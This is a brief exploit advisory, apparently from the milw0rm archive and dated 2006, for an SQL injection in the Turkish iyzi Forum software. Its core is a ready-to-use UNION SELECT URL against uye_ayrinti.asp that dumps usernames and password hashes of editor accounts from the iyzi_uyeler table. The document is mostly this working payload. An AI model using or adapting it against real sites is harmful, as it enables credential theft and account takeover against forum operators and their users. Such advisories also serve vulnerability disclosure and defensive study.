18 lines
No EOL
739 B
Text
18 lines
No EOL
739 B
Text
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
+ iyzi Forum s1 b2 (tr) SQL Injection Vulnerability +
|
|
+ Author : Fix TR +
|
|
+ Site : www.hack.gen.tr +
|
|
+ Contact : fixtr[at]bsdmail.com +
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
|
|
Download & Info: http://www.aspindir.com/Goster/2981
|
|
Bug In : uye_ayrinti.asp
|
|
Risk : High
|
|
|
|
Exp:
|
|
http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1
|
|
|
|
Password encrytped with SHA-256
|
|
|
|
# milw0rm.com [2006-09-24] |